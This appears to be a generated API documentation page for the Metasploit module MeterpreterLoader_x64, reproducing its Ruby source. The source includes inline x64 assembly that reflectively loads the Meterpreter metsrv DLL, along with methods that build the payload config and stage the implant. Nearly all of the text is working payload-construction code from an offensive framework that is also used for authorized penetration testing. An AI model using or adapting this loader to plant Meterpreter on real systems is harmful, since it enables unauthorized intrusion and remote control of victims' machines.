Module: Msf::Payload::Windows::MeterpreterLoader_x64
Constant Summary
ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER
Instance Method Summary
collapse
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var
#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
#load_rdi_dll, #load_rdi_dll_from_data
Instance Method Details
#asm_invoke_metsrv(opts = {}) ⇒ Object
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb', line 34
def asm_invoke_metsrv(opts={})
asm = %Q^
; prologue
db 0x4d, 0x5a ; 'MZ' = "pop r10"
push r10 ; back to where we started
push rbp ; save rbp
mov rbp, rsp ; set up a new stack frame
sub rsp, 32 ; allocate some space for calls.
and rsp, ~0xF ; Ensure RSP is 16 byte aligned
; GetPC
call $+5 ; relative call to get location
pop rbx ; pop return value
; Invoke ReflectiveLoader()
; add the offset to ReflectiveLoader()
add rbx, #{"0x%.8x" % (opts[:rdi_offset] - 0x15)}
call rbx ; invoke ReflectiveLoader()
; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
; offset from ReflectiveLoader() to the end of the DLL
add rbx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
^
unless opts[:stageless] || opts[:force_write_handle] == true
asm << %Q^
; store the comms socket or handle
mov [rbx], rdi
^
end
asm << %Q^
mov r8, rbx ; r8 points to the extension list
push 4 ; push up 4, indicate that we have attached
pop rdx ; pop 4 into rdx
call rax ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
^
end
|
#generate_config(opts = {}) ⇒ Object
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
|
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb', line 74
def generate_config(opts={})
ds = opts[:datastore] || datastore
opts[:uuid] ||= generate_payload_uuid
config_opts = {
arch: opts[:uuid].arch,
null_session_guid: opts[:null_session_guid] == true,
exitfunk: ds[:exit_func] || ds['EXITFUNC'],
expiration: (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
uuid: opts[:uuid],
transports: opts[:transport_config] || [transport_config(opts)],
extensions: [],
stageless: opts[:stageless] == true,
}.merge(meterpreter_logging_config(opts))
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
config.to_b
end
|
#initialize(info = {}) ⇒ Object
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb', line 18
def initialize(info = {})
super(update_info(info,
'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf', 'OJ Reeves' ],
'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] ],
'Platform' => 'win',
'Arch' => ARCH_X64,
'PayloadCompat' => { 'Convention' => 'sockrdi handlerdi -https' },
'Stage' => { 'Payload' => "" }
))
end
|
#stage_meterpreter(opts = {}) ⇒ Object
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
|
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb', line 97
def stage_meterpreter(opts={})
ds = opts[:datastore] || datastore
debug_build = ds['MeterpreterDebugBuild']
dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x64.dll', debug: debug_build))
asm_opts = {
rdi_offset: offset,
length: dll.length,
stageless: opts[:stageless] == true
}
asm = asm_invoke_metsrv(asm_opts)
bootstrap = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
if bootstrap.length > 62
raise RuntimeError, "Meterpreter loader (x64) generated an oversized bootstrap!"
end
dll[ 0, bootstrap.length ] = bootstrap
dll
end
|
#stage_payload(opts = {}) ⇒ Object
70
71
72
|
# File 'lib/msf/core/payload/windows/x64/meterpreter_loader_x64.rb', line 70
def stage_payload(opts={})
stage_meterpreter(opts) + generate_config(opts)
end
|